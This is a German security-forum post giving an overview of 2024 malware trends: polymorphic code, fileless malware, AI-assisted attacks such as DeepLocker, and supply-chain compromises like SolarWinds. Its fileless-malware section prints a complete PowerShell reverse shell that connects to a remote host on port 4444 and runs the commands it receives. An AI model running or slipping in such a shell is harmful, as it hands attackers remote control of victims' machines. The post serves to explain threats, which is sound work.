+- Team IT Security Kid2elite (https://forum.tsecurity.de)
+-- Forum: Technisches (https://forum.tsecurity.de/forumdisplay.php?fid=5)
+--- Forum: Malware (https://forum.tsecurity.de/forumdisplay.php?fid=9)
+--- Thema: Malware-Forschung 2024: Herausforderungen und Trends (/showthread.php?tid=30)
Malware-Forschung 2024: Herausforderungen und Trends - lakandor - 11.10.2024
Die Malware-Landschaft entwickelt sich stetig weiter und stellt die Forschung vor neue Herausforderungen. Hier ein kurzer Überblick über aktuelle Trends und Beispiele:
1. Polymorphe und Metamorphe Malware
Diese Malware-Varianten verändern ihren Code, um der Erkennung zu entgehen.
- Beispiel: Emotet ist ein bekannter Trojaner, der polymorphe Techniken einsetzt, um sich vor Signatur-basierten Antivirenprogrammen zu verstecken.
Python
Code:
import random
def encrypt_payload(payload):
key = random.randint(1, 255)
encrypted_payload = bytes([b ^ key for b in payload])
return encrypted_payload, key
# ... restlicher Code ...Dieser Codeausschnitt zeigt, wie ein Payload mit einem zufälligen Schlüssel verschlüsselt werden kann, wodurch bei jeder Ausführung ein anderer Code generiert wird.
2. Fileless Malware
Diese Malware hinterlässt keine Spuren auf der Festplatte und operiert im Arbeitsspeicher.
- Beispiel: Powershell-basierte Malware nutzt das vorinstallierte Windows-Tool PowerShell, um bösartigen Code auszuführen, ohne dabei Dateien auf der Festplatte zu speichern.
PowerShell
Code:
$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100',4444);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendbyte
= ([text.encoding]::ASCII).GetBytes($sendback);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush();
}
$client.Close(); Dieser Code etabliert eine Verbindung zu einem entfernten Server und führt die empfangenen Befehle direkt im Arbeitsspeicher aus.
3. Nutzung von künstlicher Intelligenz durch Angreifer
Angreifer nutzen KI, um Malware zu entwickeln, die sich an ihre Umgebung anpasst und die Erkennung umgeht.
- Beispiel: DeepLocker ist ein Proof-of-Concept Malware, die KI einsetzt, um ihr Ziel zu identifizieren und ihren Payload nur unter bestimmten Bedingungen auszuführen.
Angreifer kompromittieren Software oder Updates, um Malware in weit verbreitete Anwendungen einzuschleusen.
- Beispiel: Der Angriff auf SolarWinds im Jahr 2020 zeigte, wie verheerend Angriffe auf die Lieferkette sein können. Angreifer kompromittierten ein Software-Update von SolarWinds, um Malware in zahlreiche Organisationen einzuschleusen.